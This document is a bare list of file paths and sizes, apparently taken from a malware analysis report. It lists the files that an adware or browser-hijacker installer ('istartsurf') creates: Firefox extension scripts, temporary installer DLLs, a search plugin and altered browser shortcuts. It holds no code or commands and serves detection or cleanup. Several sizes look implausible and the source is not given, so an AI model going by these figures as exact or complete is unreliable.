    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\13.js (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\popup.html (353 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\34e7fb695b67660a97013c67488368dc.js (947 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\update.css (144 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\35cbd7aeb6004db3d2778a6f4716a2d5.js (618 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\290.js (897 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\78.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\444cf54dbe4ed104d12c04bfc893cdb9.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\2938f662dcb9bf825374bdbaa1fab291.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\288.js (969 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\91.js (6772 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\af66d255e6d2bb2228e4fb427766f91e.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.xul (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\faba5f82eda8f1d41c4f31a58aedf8d6.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\399.js (525 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ffCoreFilesIndex.txt (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\ab0256e7c7c0f522c3741adff2590815.js (964 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\220.js (1592 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button5.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button4.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\7f9ecc8563d601e115e880fc47c2d274.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\207.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\a0f3ea74f95a64204152933e45b1bff4.js (649 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\UserInfo.dll (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\inetc.dll (44 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Swift Record\lm (128 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\NSISEncrypt.dll (3320 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Swift Record\mj (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\WmiInspector.dll (3137 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\nsJSON.dll (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Swift Record\tlg (41 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\nsExec.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd7DF6.tmp\IpConfig.dll (4254 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLB61FD.tmp (144 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\wpm_v20.0.0.1953_0302.exe (988 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\XTab_Setup2121.exe (148 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\474.db (155 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\C37D.tmp (113 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\defaults\preferences\fvd.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\pack\common.js (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\index.html (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\last_tab.js (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\module\stat.js (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\C3BE.tmp (114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\module\search.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\en-US\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\style.css (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\restoreprefs.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\logo.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\misc.js (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\loading.gif (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\remoterequest.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\ru\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\C39D.tmp (113 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\js.js (660 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\C3AE.tmp (114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\addonmanager.js (531 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\quick_start.js (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\quick_start.xul (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome.manifest (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (19 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\defaults\preferences\preferences.js (379 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\en\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\default_logo.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\properties.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\simple.css (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\icon.png (628 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\install.rdf (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\googlelogo.png (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\tools\misc.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\474.json (512 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\es-419\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\it\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\include\speed_dial.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\newtab.ico (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\es\locale.properties (2 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\settings.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\skin\google_trends.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\tr\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\pl\locale.properties (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\QQBrowserFrame.dll (110 bytes)
    %Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\modules\aes.js (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\content\js\pack\ga.js (1552 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\1429400146_xpi\chrome\locale\vi\locale.properties (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\SMALLTEST[1].htm (70 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\fcd1e3efcc56376494881a5840f44668.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\195.js (414 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\75993412f37946fca43501df135b9101.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\ed25e4865e773eba7e25f1996c5a4bce.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\defaults\preferences\prefs.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\220.js (1592 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\27b108c0cebbe4aab1ad8c391e83b331.js (804 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon24.png (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\e055ba096a4270f84e5bdb65a438e474.js (28 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\9136010c804a2840f7d7c27e5d1afcd7.js (134 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\c74ac2e4f6f4f31cc4cb7288d9c2f772.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\252.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\9431c4a640636e5a4800c356296cd644.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\5f3def1ffe21b50407f4186bf271625a.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\d6ec1dab117f4ac2f2f5d541daed79e2.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\2e0fa692e5e7d961bb9d81cfa1ac2966.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\182.js (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\255.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\6c7811f10cfb98b9f1763b5345d85e98.js (357 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\670dbbe403c6360b6052e5f363ed450b.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\22.js (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\98334486106663b4a30c7033eca32d66.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\98.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\438b972f6294cdfbae9eca34e441ad3e.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome.manifest (634 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\345.js (663 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\391.js (801 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\install.rdf (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button5.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\376.js (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\d274b38a69a3c51f8a7bff7fc4721094.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\2141b52706ef745b2a22e75e33895245.js (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\extension.js (358 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\manifest.xml (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\21.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\options.js (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\33b7793cc2e4404931497edf64c26ed3.js (947 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\9941ee745cddfe1005b7e7089b614a4b.js (21 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button2.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\button3.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\13.js (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\01582ac40322b6d7683825c62a0263ad.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\locale\en-US\translations.dtd (429 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\375.js (685 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\339.js (5 bytes)
